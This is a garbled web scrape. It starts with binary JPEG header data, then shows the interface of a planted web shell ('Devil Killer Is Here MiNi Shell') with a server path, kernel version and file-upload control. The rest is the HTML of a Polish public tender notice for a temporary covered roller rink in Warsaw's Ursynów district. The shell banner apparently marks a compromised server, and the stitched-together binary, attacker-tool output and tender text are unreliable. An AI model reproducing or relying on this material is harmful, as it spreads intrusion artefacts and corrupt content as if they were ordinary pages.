JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230530/0023937901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wynajem, montaż, obsługa i demontaż zadaszonego rolkowiska na terenie działki obok Dzielnicowego Ośrodka Kultury „Ursynów” przy ul. Kajakowej 12 B w Warszawie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dzielnicowy Ośrodek Kultury Ursynów3685</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368558429</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kajakowa, 12B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-838</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">221255602</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@dokursynow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dokursynow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> instytucja kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność kulturalna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wynajem, montaż, obsługa i demontaż zadaszonego rolkowiska na terenie działki obok Dzielnicowego Ośrodka Kultury „Ursynów” przy ul. Kajakowej 12 B w Warszawie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0cbf34a1-feb0-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00239379</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00209134/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wynajem, przygotowanie, montaż i obsługa oraz późniejszy demontaż tymczasowego rolkowiska wraz z zapleczem na terenie Dzielnicowego Ośrodka Kultury Ursynów, przy ul. Kajakowej 12 B w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0cbf34a1-feb0-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3	Informacja o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z wykonawcami oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>3.1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>3.1.1.	Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>3.1.2.	We wszelkiej korespondencji związanej z niniejszym postępowaniem należy posługiwać się numerem referencyjnym: 2/DOK/V/2023.<br/>3.1.3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>3.1.4.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>3.1.5.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452). <br/>3.1.6.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. <br/>3.1.7.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/> 3.1.7.1. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (i przekazuje się jako załącznik), lub <br/> 3.1.7.2. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „Formularza do komunikacji”). <br/>3.1.8. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>Szczegółowe informacje dotyczące wymagań technicznych dostępne są w pkt 3 oraz 20 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">36. Klauzula informacyjna o przetwarzaniu danych osobowych na podstawie przepisów prawa _klauzula informacyjna dotycząca przetwarzania danych osobowych kontrahentów oraz przedstawicieli kontrahentów przez Dzielnicowy Ośrodek Kultury Ursynów</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/DOK/V/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wynajem, montaż, obsługa i demontaż zadaszonego rolkowiska na terenie działki obok Dzielnicowego Ośrodka Kultury „Ursynów” przy ul. Kajakowej 12 B w Warszawie.<br/>Przedmiot zamówienia obejmuje: wynajem, przygotowanie, montaż i obsługę oraz późniejszy demontaż tymczasowego, zadaszonego rolkowiska z nawierzchnią z modułowych paneli wraz z zapleczem na terenie działki obok Dzielnicowego Ośrodka Kultury „Ursynów” przy ul. Kajakowej 12 B w Warszawie.<br/>Celem realizacji zamówienia jest stworzenie tymczasowego zadaszonego rolkowiska (umożliwiającego również jazdę na wrotkach) na terenie na którym wcześniej (tj. od 28 grudnia 2022 do 19 marca 2023 r). funkcjonowało sezonowe lodowisko wraz z zapleczem.<br/>Zamówienie będzie realizowane na terenie o powierzchni ok. 1300 metrów kwadratowych, znajdującym się na działce nr 163/8 z obrębu 1-09-34, pomiędzy Przychodnią SPZOZ przy ul. Kajakowej 12, a Dzielnicowym Ośrodkiem Kultury „Ursynów” przy ul. Kajakowej 12 b w Warszawie. Teren ten ma nawierzchnię ziemną. <br/>Plan posadowienia rolkowiska znajduje się w załączniku nr 7 do SWZ – Opis przedmiotu zamówienia.<br/>Przedmiot zamówienia obejmuje kompleksową realizację całości przedsięwzięcia, co oznacza przygotowanie terenu, na którym zostanie ustawiona infrastruktura rolkowiska, montaż infrastruktury wraz nawierzchnią do jazdy na rolkach i wrotkach oraz zadaszeniem, utrzymanie i obsługę funkcjonowania obiektu przez cały czas trwania zamówienia, następnie demontaż infrastruktury oraz uporządkowanie terenu.<br/>Korzystanie z rolkowiska ma odbywać się bezpłatnie dla użytkowników. Za wypożyczenie rolek i kasków Wykonawca może pobierać ustaloną przez siebie opłatę, o ile Wykonawca zdecyduje się na prowadzenie wypożyczalni tego sprzętu. <br/>Szczegółowy zakres Przedmiotu zamówienia określają opis przedmiotu zamówienia, technologia wykonania robót, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót. <br/>Wymagania związane z realizacją zamówienia, w szczególności: <br/>	Przedstawienie zamawiającemu projektu zagospodarowania terenu oraz pozostałych dokumentów dotyczących infrastruktury objętej przedmiotem zamówienia.<br/>	Przygotowanie terenu, montaż i ustawienie infrastruktury, demontaż infrastruktury.<br/>	Wynajem, montaż i demontaż zadaszenia rolkowiska.<br/>	Dostawa, montaż i demontaż nagłośnienia i oświetlenia.<br/>	Dostawa i posadowienia kontenera.<br/>	Zapewnienie oprawy muzycznej<br/>	Zapewnienie apteczki pierwszej pomocy, trzech toalet.<br/>	Obsługa funkcjonowania rolkowiska.<br/>	Demontaż całej infrastruktury.<br/>Uwaga:<br/>	W przypadku wystąpienia uszkodzenia nawierzchni rolkowiska bądź innych elementów tego obiektu, które mogą zagrażać korzystającym z obiektu, Wykonawca niezwłocznie zabezpieczy miejsce wystąpienia uszkodzenia przed dostępem osób trzecich tj. wyłączy je z możliwości korzystania oraz poinformuje o tym fakcie Zamawiającego. <br/>	W przypadku uszkodzenia powierzchni przekraczającej 40% rolkowiska Wykonawca wyłączy cały obiekt z korzystania. <br/>	Wykonawca zobowiązany jest do podjęcia/rozpoczęcia naprawy w ciągu maksymalnie 24 godzin od chwili powiadomienia Zamawiającego o wystąpieniu awarii. Te same terminu obowiązuję w przypadku, gdy o wystąpieniu awarii Zamawiający poinformuje Wykonawcę. <br/>	Wykonawca zobligowany jest do naprawy powstałego uszkodzenia w terminie maksymalnie 48 godzin a minimalnie 24 godzin. Czas naprawy, pod pojęcie którym rozumie się również usunięcie awarii, stanowi kryterium oceny ofert i nie może być dłuższy niżeli 48 godzin. <br/>Obowiązki wynikające z klauzuli społecznej, ustawy o elektromobilności i paliwach alternatywnych oraz dotyczące dostępności dla osób z niepełnosprawnościami.<br/>Klauzula społeczna<br/>Zamawiający w przedmiotowym postępowaniu stosuje klauzulę społeczną na podstawie art. 95 ust. 1 ustawy z dnia 29 stycznia 2004 r., Prawo zamówień publicznych (Dz. U. z 2022 r., poz. 1710, z późn. zm.)<br/>Wykonawca zobowiązuje się do zapewnienia, że czynności w zakresie realizacji zamówienia na usługi przez cały okres wykonywania Przedmiotu Umowy, będą wykonywane przez osoby zatrudnione na podstawie umowy o pracę w rozumieniu Kodeksu Pracy przez Wykonawcę lub Podwykonawcę.<br/>Warunek, o którym mowa w ppkt b) zostanie spełniony poprzez zatrudnienie na podstawie umowy o pracę w rozumieniu Kodeksu pracy nowego/ych pracownika/ów lub wyznaczenie już zatrudnionego/ych do realizacji zamówienia w zakresie usług w ramach pełnienia funkcji Kierownika Rolkowiska, do którego zadań będzie należeć w szczególności koordynowanie, kontrolowanie i nadzorowanie takich czynności jak: <br/>•	przygotowanie projektu zagospodarowania terenu, <br/>•	przygotowanie terenu pod montaż infrastruktury, <br/>•	montaż rolkowiska i towarzyszącej mu infrastruktury, <br/>•	funkcjonowanie rolkowiska - obejmujące także pracę obsługi<br/>•	przeprowadzanie kontroli bezpieczeństwa funkcjonowania infrastruktury<br/>•	demontaż i uporządkowanie terenu oraz doprowadzenie go do stanu pierwotnego, <br/>•	przygotowanie sprawozdania z realizacji przedmiotu zamówienia. <br/> Szczegółowe wymagania dotyczące sposobu dokumentowania i weryfikacji zatrudnienia tych osób przez Wykonawcę lub podwykonawcę oraz uprawnienia Zamawiającego z tytułu niespełnienia tych wymagań zawarte są w projektowanych postanowieniach umowy stanowiące załącznik nr 3 do SWZ.<br/>Zamawiający w ramach przedmiotowego zamówienia nie określa obowiązków wynikających z ustawy o elektromobilności i paliwach alternatywnych.<br/>Zamawiający w ramach przedmiotowego zamówienia określa minimalne wymagania w zakresie dostępności dla osób z niepełnosprawnościami.<br/>Wykonawca zobowiązany jest do zapewnienia dostępności w obszarze dostępności informacyjno-komunikacyjnej w zakresie:<br/>obsługi, w ramach zadania publicznego, z wykorzystaniem środków wspierających komunikowanie się, o których mowa w ustawie o języku migowym i innych środkach komunikowania się lub przez wykorzystanie zdalnego dostępu online do usługi tłumacza przez strony internetowe i aplikacje,<br/>instalacji urządzeń lub innych środków technicznych do obsługi osób słabosłyszących, w ramach zadania publicznego, np. pętla indukcyjna, system FM lub urządzeń opartych o inne technologie, których celem jest wspomaganie słyszenia,<br/>w przypadku umieszczenia na stronie internetowej Wykonawcy informacji o realizacji przedmiotu zamówienia, umieszczenia jej w postaci pliku zawierającego tekst odczytywalny maszynowo, nagrania treści w polskim języku migowym i informacji w tekście łatwym do czytania i zrozumienia,<br/>na wniosek osoby ze szczególnymi potrzebami, komunikacji w sposób preferowany przez osobę ze szczególnymi potrzebami.<br/>Szczegółowe kwestie określone zostały w załączniku nr 7 do SWZ_Opis przedmiotu zamówienia.<br/><br/>Szczegółowy opis przedmiotu zamówienia określa niniejsza SWZ oraz:<br/>Projektowane postanowienia umowy stanowiące załącznik nr 3 do SWZ;<br/>Opis przedmiotu zamówienia stanowiący załącznik nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92620000-3 - Usługi w zakresie sportu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">70310000-7 - Usługi wynajmu lub sprzedaży obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">122 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria przypisując mu odpowiednią wagę procentową:<br/>1. kryterium: „cena brutto” – waga 60%<br/>2. kryterium: „czas naprawy” – waga 40%<br/> Zasady oceny ofert według ustalonych kryteriów:<br/>Każda z ofert będzie oceniana wg powyższych kryteriów zgodnie z poniższym wzorem:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna ilość punktów<br/>Pc – ilość punktów w kryterium „cena brutto”<br/>Pg – ilość punktów w kryterium „czas naprawy”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>Zdolności technicznej lub zawodowej<br/>1.	Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonali usługę1 polegającą na montażu i demontażu oraz obsłudze tymczasowego obiektu sportowego (działającego przez co najmniej 2 miesiące), w którym powierzchnia do aktywności sportowych, udostępniana użytkownikom miała co najmniej 400 metrów kwadratowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz wykonanych usług (zgodny z załącznikiem nr 4 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami wykaz, o którym mowa w pkt 16.1 SWZ dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia, podmiotowe środki dowodowe oraz inne dokumenty i oświadczenia składane wraz z ofertą:<br/>1.	Formularz ofertowy wypełniony wg wzoru stanowiącego załącznik nr 1 do SWZ<br/>2.	Formularz cenowy wypełniony wg wzoru stanowiącego załącznik nr 2 do SWZ<br/>3.	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania wg wzoru stanowiącego załącznik nr 5 do SWZ<br/>4.	W przypadku, gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy, do oferty należy dołączyć dokument (np. pełnomocnictwo) potwierdzający, że oferta została złożona przez osobę umocowaną do reprezentowania Wykonawcy (np. pełnomocnictwo, umowa spółki cywilnej); <br/>5.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>6.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej, 